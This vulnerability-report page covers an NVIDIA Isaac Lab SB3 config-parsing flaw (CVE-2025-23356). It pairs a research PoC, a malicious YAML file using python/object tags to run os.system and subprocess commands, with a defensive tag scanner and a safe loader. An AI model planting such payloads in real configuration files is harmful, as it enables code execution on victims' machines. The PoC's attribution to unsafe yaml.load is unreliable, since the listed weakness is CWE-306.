Security Vulnerability Report
CVE-2025-23356 CVSS 8.4 HIGH

CVE-2025-23356

Published: 2025-10-14 18:15:35
Last Modified: 2026-04-15 00:35:42

Description

NVIDIA Isaac Lab contains a vulnerability in SB3 configuration parsing. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

All versions of NVIDIA Isaac Lab that use the unsafe SB3 configuration parser (see NVIDIA's official security bulletin for the exact version range).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-23356 PoC - NVIDIA Isaac Lab SB3 Config Parsing RCE
# Vulnerability: Unsafe YAML deserialization in SB3 configuration parser
import yaml
import os
import sys

# Malicious SB3 configuration file exploiting unsafe YAML deserialization
# The SB3 config parser uses yaml.load() without SafeLoader, allowing
# arbitrary Python object instantiation during config parsing.
malicious_config = """
# Malicious SB3 configuration with embedded Python code execution
algorithm: PPO
# Inject malicious payload via YAML Python object tag
policy_kwargs: !!python/object/apply:os.system
  - "id > /tmp/pwned.txt; touch /tmp/rce_evidence"
# Alternative: use subprocess for command execution
learning_rate: !!python/object/apply:subprocess.check_output
  - ["id"]
# Trigger code execution during config loading
env:
  class_name: !!python/object/new:subprocess.Popen
    args:
      - ["whoami"]
"""

def exploit(target_config_path):
    """
    Exploit CVE-2025-23356 by writing a malicious SB3 config file
    and triggering its parsing by NVIDIA Isaac Lab.
    """
    # Step 1: Write malicious configuration
    with open(target_config_path, 'w') as f:
        f.write(malicious_config)
    print(f"[+] Malicious config written to {target_config_path}")

    # Step 2: Trigger Isaac Lab to load the config
    # When Isaac Lab loads this config, yaml.load() will execute
    # the embedded Python code automatically
    print("[*] Waiting for Isaac Lab to parse the malicious config...")
    print("[*] Code execution will occur during config deserialization")

if __name__ == "__main__":
    config_path = sys.argv[1] if len(sys.argv) > 1 else "malicious_sb3_config.yaml"
    exploit(config_path)
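
A defender-side check for the issue the PoC comments describe, added here as an example and not code from this page, NVIDIA, or Isaac Lab. It assumes, as those comments state, that the parser loads YAML with an unsafe loader; `find_python_tags`, `load_sb3_config` and both sample configs are constructed for illustration, and PyYAML is required.

```python
import yaml

PREFIX = "tag:yaml.org,2002:"

# Constructed sample inputs (not taken from Isaac Lab).
BENIGN_CONFIG = """\
algorithm: PPO
learning_rate: 0.0003
policy_kwargs:
  net_arch: [64, 64]
"""
# Carries a python/* tag naming a harmless builtin; it is never called here.
TAGGED_CONFIG = """\
algorithm: PPO
policy_kwargs: !!python/object/apply:builtins.len
  - [1, 2, 3]
"""


def find_python_tags(text):
    """Return sorted (line, tag) pairs for nodes carrying a python/* tag.

    yaml.compose() only builds the node graph; no constructor runs, so
    nothing in the document is instantiated or called during the scan.
    """
    hits, seen = [], set()
    stack = [yaml.compose(text, Loader=yaml.SafeLoader)]
    while stack:
        node = stack.pop()
        if node is None or id(node) in seen:  # empty doc, or alias already visited
            continue
        seen.add(id(node))
        if node.tag.startswith(PREFIX + "python/"):
            hits.append((node.start_mark.line + 1, node.tag[len(PREFIX):]))
        if isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
        elif isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                stack.extend((key, value))
    return sorted(hits)


def load_sb3_config(text):
    """Hypothetical hardened loader: SafeLoader rejects python/* tags."""
    try:
        return yaml.safe_load(text)
    except yaml.constructor.ConstructorError as exc:
        raise ValueError(f"rejected unsafe config: {exc.problem}") from exc
```

Running `find_python_tags` over configuration files before they reach a training job gives a line-numbered finding for triage, while `load_sb3_config` shows the parse-time behaviour a safe loader provides.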

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23356", "sourceIdentifier": "[email protected]", "published": "2025-10-14T18:15:35.177", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Isaac Lab contains a vulnerability in SB3 configuration parsing. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5708", "source": "[email protected]"}]}}